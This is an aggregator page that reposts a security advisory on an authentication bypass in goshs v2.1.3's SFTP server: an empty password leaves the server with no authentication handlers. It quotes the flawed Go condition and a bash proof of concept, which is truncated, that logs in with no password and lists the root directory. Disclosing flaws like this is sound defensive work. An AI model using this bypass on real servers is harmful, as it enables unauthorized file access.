CSIRTS // UNIFIED SECURITY ADVISORY FEEDSYS ● ONLINE · POWERED BY INTELFUSIONS.COM

GHSA-rjrw-mjq6-hpmm: goshs SFTP authentication bypass via empty password (incomplete fix of CVE-2026-40884)

criticalCVSS 9.1CVE-2026-62325
Summary Start goshs v2.1.3 with -b 'admin:' -sftp. No -fkf. SFTP accepts connections without password. CVE-2026-40884 blocks the empty-username variant (-b ':pass'). The empty-password variant bypasses that fix. CVE-2026-40884 CVE-2026-40884 (GHSA-c29w-qq4m-2gcv, Apr 13 2026) reported the empty-username case: -b ':pass' with -sftp. sftpserver.go:85 uses &&: if s.Username != "" && s.Password != "" { sshServer.PasswordHandler = func(ctx ssh.Context, password string) bool { return subtle.ConstantTimeCompare([]byte(ctx.User()), []byte(s.Username)) == 1 && subtle.ConstantTimeCompare([]byte(password), []byte(s.Password)) == 1 } } Empty username → Username != "" false → PasswordHandler nil. No -fkf means PublicKeyHandler also nil. gliderlabs/ssh sees all handlers nil and sets NoClientAuth = true. Unauthenticated access. Patrickhener fixed it with a sanity check at sanity/checks.go:114-118: if opts.FTP && opts.FTPSFTPMode && strings.HasPrefix(opts.BasicAuth, ":") { logger.Fatal("When using SFTP with password authentication, the username cannot be empty. ...") } HasPrefix(":") catches empty username. It does not catch empty password. Empty Password Bypass Same && at sftpserver.go:85. Same nil handler. Different input: goshs -b 'admin:' -sftp - Username = "admin", Password = "" - Username != "" && Password != "" → false. Password is empty. - PasswordHandler not set. No -fkf → PublicKeyHandler not set. - gliderlabs/ssh → NoClientAuth = true. CVE-2026-40884 patched the symptom (empty username) with input validation. Root cause (&&) stayed in the code. v2.1.3 still has it. That makes any unanticipated input format exploitable. PoC #!/usr/bin/env bash set -euo pipefail HOST="${1:-127.0.0.1}" PORT="${2:-2121}" echo "[*] Connecting to goshs SFTP at $HOST:$PORT with empty password..." echo "ls -la /" | sftp -o StrictHostKeyChecking=no \ -o UserKnownHostsFile=/dev/null \ -o PreferredAuthentications=none,password \ -o PubkeyAuthentication=no \ -P "$PORT" -b - admin@"$

Details

Source
GitHub Security Advisories (INTL · database · site)
Severity
critical — CVSS 9.1
Published
2026-07-28
Last updated
2026-07-28
Exploitation
Not in CISA KEV at last sync

Original advisory: https://github.com/advisories/GHSA-rjrw-mjq6-hpmm

Exploitation outlook

EPSS (FIRST.org) estimates each CVE’s probability of exploitation in the next 30 days — here is the CSIRTS.com read on those numbers.

Referenced CVEs

CVECSIRTS overviewExternal
CVE-2026-62325coverage & exploitation statusNVD · CVE.org

Same CVEs, other sources

How other CERTs, PSIRTs and databases cover the vulnerabilities in this advisory.

More from GitHub Security Advisories